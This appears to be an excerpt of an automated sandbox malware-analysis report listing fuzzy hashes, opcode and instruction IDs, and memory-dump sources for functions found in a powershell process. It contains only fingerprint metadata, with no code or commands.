                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$4'dq$x.gk$-gk
                                                                    • API String ID: 0-4103894591
                                                                    • Opcode ID: aa0f2712f7f543aa20c356c7e23f3e7f6286bead60a98e6ebe7ca2e7ac3e895c
                                                                    • Instruction ID: 48d7d789ede1cfafb347d41a5e94f0e41dafec60713bdfcdd9316cb01da6c8f9
                                                                    • Opcode Fuzzy Hash: aa0f2712f7f543aa20c356c7e23f3e7f6286bead60a98e6ebe7ca2e7ac3e895c
                                                                    • Instruction Fuzzy Hash: 5EA1C0B0A412059FCB14DF68D554BAEBBB2EF88318F24D069D9052F795CB35EC82CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl
                                                                    • API String ID: 0-2839572696
                                                                    • Opcode ID: d7a411195299b79363e6a9bdc71d0e64029bf556eeb555d19ea0a84e2ae93e2e
                                                                    • Instruction ID: 055ea3020618634b738fe0fb422a5dfc51fb2ffc4fdd097ad74f7cd4994e9e3d
                                                                    • Opcode Fuzzy Hash: d7a411195299b79363e6a9bdc71d0e64029bf556eeb555d19ea0a84e2ae93e2e
                                                                    • Instruction Fuzzy Hash: D1325AB4A11205CFDB14CF98D540AAABBF2AF85308F55D099D909AF756C772EC86CF80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl
                                                                    • API String ID: 0-2839572696
                                                                    • Opcode ID: 615692bd883d8cfe533dc601105ec24ebcca01e06906a985ba71b79a08286695
                                                                    • Instruction ID: 7af3fbc7ad7ab458a0f82d8fe2362b983ac354b2e6e84c6ec528cb9306dfaf54
                                                                    • Opcode Fuzzy Hash: 615692bd883d8cfe533dc601105ec24ebcca01e06906a985ba71b79a08286695
                                                                    • Instruction Fuzzy Hash: 611279B4A11205DFDB14CF98C550EAABBF2AF85308F54C069D909AF756C772EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$x.gk
                                                                    • API String ID: 0-3514373553
                                                                    • Opcode ID: e782b7ff0c4d8a3da3211ebb343e16a308db5f78ccb868ef79e060ae92877afe
                                                                    • Instruction ID: 67cefc2701715900a9cb1ac61fe8fa20308ad1e661cbc8b903d6c3b1b90a42fe
                                                                    • Opcode Fuzzy Hash: e782b7ff0c4d8a3da3211ebb343e16a308db5f78ccb868ef79e060ae92877afe
                                                                    • Instruction Fuzzy Hash: 5C91C1F4B002049FDB14DF68D955BAEBBE3AB88344F549064D9056FB91CB71EC81CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$$dq
                                                                    • API String ID: 0-3750620159
                                                                    • Opcode ID: c2d336e8015caa8616a1beca507380c2d733a9dbed4684ea2c766b0a14b206ca
                                                                    • Instruction ID: 38396bdf2bcb36220d9b3eb7ffe51f3565527c44510bf24e959521a659915fc5
                                                                    • Opcode Fuzzy Hash: c2d336e8015caa8616a1beca507380c2d733a9dbed4684ea2c766b0a14b206ca
                                                                    • Instruction Fuzzy Hash: 23415BF2B051218BDF10A678A91157AB792EFC5315B1494FACA068F641DF32C981C7E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$x.gk
                                                                    • API String ID: 0-1643092212
                                                                    • Opcode ID: 7a4f3faa31782c23c82a5262859bfea79498e2d3dad816cd3d3b4aa8e6423ec7
                                                                    • Instruction ID: 2881dbfeb143dce4b929375cf659d1d0bd2f19d9594657ff685962b238d6006a
                                                                    • Opcode Fuzzy Hash: 7a4f3faa31782c23c82a5262859bfea79498e2d3dad816cd3d3b4aa8e6423ec7
                                                                    • Instruction Fuzzy Hash: 2A81C0F4A01204AFD714DF64D555BAABBF2AF88344F549064E9056FB91CB72AC80CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq
                                                                    • API String ID: 0-2306408947
                                                                    • Opcode ID: 26f6085ae738400dd722679c5be5dbe58781a2ed09bcaf2ef4bd41b4d9e06005
                                                                    • Instruction ID: ffdef6d816dc2590f82f494258bfdd78e6ba0421a301d9468ae14232c8de9851
                                                                    • Opcode Fuzzy Hash: 26f6085ae738400dd722679c5be5dbe58781a2ed09bcaf2ef4bd41b4d9e06005
                                                                    • Instruction Fuzzy Hash: FC41ADF17412118BCF259A79A4516AB7B925F8633DB14D0BAD912CF292DF318881C362
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$$dq
                                                                    • API String ID: 0-2272816146
                                                                    • Opcode ID: 20f9022c44e3471100690653c36cd60e69015a6acd6cc2e5a36ecccb8b2fd710
                                                                    • Instruction ID: ff2dd8e8e6729a7213cee4451d240f0bb996833fecb848fd31c0122921c3230d
                                                                    • Opcode Fuzzy Hash: 20f9022c44e3471100690653c36cd60e69015a6acd6cc2e5a36ecccb8b2fd710
                                                                    • Instruction Fuzzy Hash: 440100F2E07242DBCF209A60B6142B5B760FF86258F0964FADB414F541C73598C0CB93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d%jq$d%jq
                                                                    • API String ID: 0-3208366823
                                                                    • Opcode ID: ef987579934f042fdf28be2e805a071d2502f09aaba1531332adc4eca3095700
                                                                    • Instruction ID: 0577e12a69b0815eabf68f55daf09f13d37f52744fe151bdd5b455e6eccc2a63
                                                                    • Opcode Fuzzy Hash: ef987579934f042fdf28be2e805a071d2502f09aaba1531332adc4eca3095700
                                                                    • Instruction Fuzzy Hash: C1F0C275A00208DFCB18CF98D894AAEF772FF88321B24855CD41AA7650C736AC12CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d%jq$d%jq
                                                                    • API String ID: 0-3208366823
                                                                    • Opcode ID: 58f0cf98d6c02ab55a4aa3ae3079cf84574d124750764b9d4a99b4b5e1641e94
                                                                    • Instruction ID: 341a14bbc1c6068afa0b4b1436d431b7f0568d19362a43ed49df57a90cb7802c
                                                                    • Opcode Fuzzy Hash: 58f0cf98d6c02ab55a4aa3ae3079cf84574d124750764b9d4a99b4b5e1641e94
                                                                    • Instruction Fuzzy Hash: B8F02431E00208EFCB14CF98D8849AEF772FF8C320B24815CD55AA7290CB36AC52CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vjj
                                                                    • API String ID: 0-4208670319
                                                                    • Opcode ID: 2f37743e3a060a91cfb74b23fa3d348446550ce64a57e7712072683ab4c3d381
                                                                    • Instruction ID: 144636b59f3d009f77d300e11dd606bd6fc852a3b3019d702358a1862be88ea4
                                                                    • Opcode Fuzzy Hash: 2f37743e3a060a91cfb74b23fa3d348446550ce64a57e7712072683ab4c3d381
                                                                    • Instruction Fuzzy Hash: F4B13870E00209CFDB10CFA9D9857AEBBF2BF48315F14812DD819E7695EB789846CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHdq
                                                                    • API String ID: 0-2991842255
                                                                    • Opcode ID: 3638ca20618036c8f28468d6f76b4423febbb5858214adeb62bc6b345ab0f487
                                                                    • Instruction ID: 941ff70d0e599d10b7f1fc4d45bcc98719319aa540f8cb6c7985fbb1d9e7709f
                                                                    • Opcode Fuzzy Hash: 3638ca20618036c8f28468d6f76b4423febbb5858214adeb62bc6b345ab0f487
                                                                    • Instruction Fuzzy Hash: 35717770E042598FDB19DBE8C9447AEBBB2BF85306F24442DE402AF795DB74AD49CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHdq
                                                                    • API String ID: 0-2991842255
                                                                    • Opcode ID: 78a700ef82baab67319f801b16925c1f0aef3f7f38c1e82e9b6a4a3dee8096f0
                                                                    • Instruction ID: 3f8af39fe2f96ba5b20452335410fb246d15b980cc2966bfeb3226ef380d0ef2
                                                                    • Opcode Fuzzy Hash: 78a700ef82baab67319f801b16925c1f0aef3f7f38c1e82e9b6a4a3dee8096f0
                                                                    • Instruction Fuzzy Hash: 7E513770E002598FDB15DFA4C9486ADBBB2BF85305F24452DE406AF654DB74AC45CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PHdq
                                                                    • API String ID: 0-2991842255
                                                                    • Opcode ID: 1bd8ceda7cdbb15e0c1beae0493403df3a72207da0272586f3394c3dfbe6ca6c
                                                                    • Instruction ID: f24c86abe1d26b6bb7f0c700ad5ab44010ae88d99144cdc058b8b94947981e35
                                                                    • Opcode Fuzzy Hash: 1bd8ceda7cdbb15e0c1beae0493403df3a72207da0272586f3394c3dfbe6ca6c
                                                                    • Instruction Fuzzy Hash: 82515530E043198FDB19DFA4D9447ADBBB2BF85306F24442DE806AB6A4DB79AC45CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.gk
                                                                    • API String ID: 0-1304459573
                                                                    • Opcode ID: e0fb4b08b30934664bad388aa462d5db839b6c2eb3266828f4f06c181de3e9e4
                                                                    • Instruction ID: 4632d2a5a77a35181905cf9ce2d603bcc90ed4fcb636bf83e11df628acdeb4b5
                                                                    • Opcode Fuzzy Hash: e0fb4b08b30934664bad388aa462d5db839b6c2eb3266828f4f06c181de3e9e4
                                                                    • Instruction Fuzzy Hash: 6631C5B0B412149BD704ABB4C965FAF7AB3EB84344F60C025EA116F781CF76AD428BD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c3efefa007325e570761bd54efe8405f3ef371339a81bacedd331bf9932c7e8
                                                                    • Instruction ID: d236e23e15f65f611f97e621f2d30f0b409499d5f82515e1c24cc3107e961e4d
                                                                    • Opcode Fuzzy Hash: 0c3efefa007325e570761bd54efe8405f3ef371339a81bacedd331bf9932c7e8
                                                                    • Instruction Fuzzy Hash: 5FA17035A00218DFDB14DFE5D584A9DBBB6FF88314F125558E806AB368EB34BD4ACB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f79265ad695a468ee95932dbf13998a8570bce5150e4fba94b0885ebd130a86
                                                                    • Instruction ID: a00200541f85d6b148e779327357ccbeeffa13ac6c112dd6bfc7c4fa6e938586
                                                                    • Opcode Fuzzy Hash: 9f79265ad695a468ee95932dbf13998a8570bce5150e4fba94b0885ebd130a86
                                                                    • Instruction Fuzzy Hash: FFA15A70E00609CFDB10CFA9D9817DDBBF2AF48315F14852DE819AB695EB749886CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e1064b8a1a742f8276c4507447070a0d9a7607d5f2ac9ea87301c250abf16c1
                                                                    • Instruction ID: b98ef384fae0322f1698b87c9cde2220412bd82f3799ee95c478706fc12a1b93
                                                                    • Opcode Fuzzy Hash: 4e1064b8a1a742f8276c4507447070a0d9a7607d5f2ac9ea87301c250abf16c1
                                                                    • Instruction Fuzzy Hash: 52614C34A002598FCB09DFA4C544AADBBF2FF84305F159554E412AF369DB78AD89CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5cd95e35a59d53702bc4d0f0f8ed1287213ef5c798fd14229f0fb04815d328c
                                                                    • Instruction ID: 48bca063f33787dfde226573d53ff3b0d288f1b8a65f3dde0153eea89feb2faf
                                                                    • Opcode Fuzzy Hash: f5cd95e35a59d53702bc4d0f0f8ed1287213ef5c798fd14229f0fb04815d328c
                                                                    • Instruction Fuzzy Hash: B041AEF37012118BCF219779A5116AE7BA6AFC1359B1094AAEB018F755CE328941C3B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3f0a97ea35df81d809e0a0631f96ad9bc99ece6e12ff79791124ffc743246067
                                                                    • Instruction ID: 10a488be2a66576029d0e3f58d16dc5b492c329e8b634b54f670d7464f2ad836
                                                                    • Opcode Fuzzy Hash: 3f0a97ea35df81d809e0a0631f96ad9bc99ece6e12ff79791124ffc743246067
                                                                    • Instruction Fuzzy Hash: 3F4168B7312216CBEB114A3DE8503BBBB929FC6325F1890BADB458B691CB31C581C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1999783757.0000000004E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E2D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4e2d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 438311fb009d6895dbd3c063c54163aa859f86ca30e3a4879f386e3e3a82ea1d
                                                                    • Instruction ID: 3837077cc3bdca0da19d5b830469919c0163c5db97395d9b10d4a44aa94c1af8
                                                                    • Opcode Fuzzy Hash: 438311fb009d6895dbd3c063c54163aa859f86ca30e3a4879f386e3e3a82ea1d
                                                                    • Instruction Fuzzy Hash: DF0126711083549AE7208E29EEC4F67BFD8DF51339F08C41AEE484B292C678A841D7B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2000061915.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00eb2b4caa6cfa7a323b16aaf940b2cd5666d9caedd741823956680ed49cea72
                                                                    • Instruction ID: 7202d47c25d94e932ee866351a1665e66c4dbe0f7ac674d268780146501fc1f6
                                                                    • Opcode Fuzzy Hash: 00eb2b4caa6cfa7a323b16aaf940b2cd5666d9caedd741823956680ed49cea72
                                                                    • Instruction Fuzzy Hash: 06014FB8B002199FDB00DF98D490AAEF771FF9D314B249259D95AA7361CB35EC078B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2195df4c6c008aba3593d0566a03cb881b0794209982f53eca5419a87ad0fef1
                                                                    • Instruction ID: 2b488e0a187f8891df2a8aa25f00d70bb19ae7483ae24e48846565a1c621aa8c
                                                                    • Opcode Fuzzy Hash: 2195df4c6c008aba3593d0566a03cb881b0794209982f53eca5419a87ad0fef1
                                                                    • Instruction Fuzzy Hash: 9C011730A04219DFDB149FE0C955BAEBFB1BB44306F20042DE502ABA55DB759841DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95917b9e729e4ddd4a0f73d2758244e768cafbd7964b34ea1e087004b1e41204
                                                                    • Instruction ID: 6542f162e1933dc71c81a64ac1d024300ad1c659d9fc2c8f13b9368d584848b4
                                                                    • Opcode Fuzzy Hash: 95917b9e729e4ddd4a0f73d2758244e768cafbd7964b34ea1e087004b1e41204
                                                                    • Instruction Fuzzy Hash: 87014830A04229DFDB14DFE0C916BAEBBB6FF44306F10442CE502AB695DB756842CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 613d46d9c6fb41f417d9320680fcdc02ea99a2429f026ada97ff81cfe391d92b
                                                                    • Instruction ID: e4382bf05358fb0906df68609fb8503890c5860f213a6340627ea1033de2d506
                                                                    • Opcode Fuzzy Hash: 613d46d9c6fb41f417d9320680fcdc02ea99a2429f026ada97ff81cfe391d92b
                                                                    • Instruction Fuzzy Hash: CF01AD302047209BC315EB7898859AA7BB6FBC5217714482EE0128BB51CB39E801CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1999783757.0000000004E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E2D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4e2d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5b4951c7849c96ad90b9e5f1d7e6f147ae62176aec0af6bd929f74983c87f94a
                                                                    • Instruction ID: 8baa39f7b8205efd32762dc5aea3752929cca18fd21eac1e8537f83c0035a909
                                                                    • Opcode Fuzzy Hash: 5b4951c7849c96ad90b9e5f1d7e6f147ae62176aec0af6bd929f74983c87f94a
                                                                    • Instruction Fuzzy Hash: 4CF0C272004344AEE7108E15DD84F62FFD8EB51338F18C05AED484B296C279A840CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c119dd7b30e7a0d7cb2699e4464218f47d07e400277719e3ce0f6bfe6201fc74
                                                                    • Instruction ID: 88bf328fcf102ebe6cc406646415b0371244930da50ef32bf48996a95b56ca0e
                                                                    • Opcode Fuzzy Hash: c119dd7b30e7a0d7cb2699e4464218f47d07e400277719e3ce0f6bfe6201fc74
                                                                    • Instruction Fuzzy Hash: 7BF0AF30A1420ADFDB00DBF0C915B7E7B71AF9430AF10442CE502AB695DF795C058B52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 667753a08b90895ae4b2e70527b29c21a7519301a7d2135fbaac4f8f3e481a7b
                                                                    • Instruction ID: 07ba8eadab33f2af8d894f18786d002b7e3addc1f73df11ed332531c5f8024cb
                                                                    • Opcode Fuzzy Hash: 667753a08b90895ae4b2e70527b29c21a7519301a7d2135fbaac4f8f3e481a7b
                                                                    • Instruction Fuzzy Hash: 2FF01934A04119DFCB10DFE5D919BAEBFB5EB88342F200029E902AB755DA785D01DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73d8fbb6b4bb0173ac5d6a92225a9d26334072aeb310ba496928f0766a2a6b1d
                                                                    • Instruction ID: b596b3bf2193157a3a66bef3d1f28fb444c49c1512e291f9290312889def44a5
                                                                    • Opcode Fuzzy Hash: 73d8fbb6b4bb0173ac5d6a92225a9d26334072aeb310ba496928f0766a2a6b1d
                                                                    • Instruction Fuzzy Hash: 6FF0BB35A00505EFCB14CF98D8849AEF771FF88320B24815DD515A7690CB356D52C750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c845942ae329adf9b255e315283a91506adc4a301ef48420f9c3c02190250e00
                                                                    • Instruction ID: bca3b3a427e7100f1afcd6355f51174863aa2ab828ce9037c70ced677c2b673d
                                                                    • Opcode Fuzzy Hash: c845942ae329adf9b255e315283a91506adc4a301ef48420f9c3c02190250e00
                                                                    • Instruction Fuzzy Hash: 8BF03731A04229EFCB10DFE4D915BAEBFB6FF98342F20042DE502AB252DB7449019F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1cdab4db06a300904704ad87708872b9b4b492779d3615f0c0ec327637a8ec0
                                                                    • Instruction ID: 71c03c2626ff60cc6fa47462bba9f922ae97ec60d9e713eae43cd4499ff634e8
                                                                    • Opcode Fuzzy Hash: d1cdab4db06a300904704ad87708872b9b4b492779d3615f0c0ec327637a8ec0
                                                                    • Instruction Fuzzy Hash: 3AF03731904119EFCB10DFE4D919BAEBFB5EB88342F20442DE902AB252DA744801DF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f952ac02f56408a10d4c0fc6411022896688b2c3316f1ff8e71fe4871583c0bb
                                                                    • Instruction ID: 6bab30b6821c645ed5ff6d47851beb33a681227f6f6a19ce5608d248ed19abc8
                                                                    • Opcode Fuzzy Hash: f952ac02f56408a10d4c0fc6411022896688b2c3316f1ff8e71fe4871583c0bb
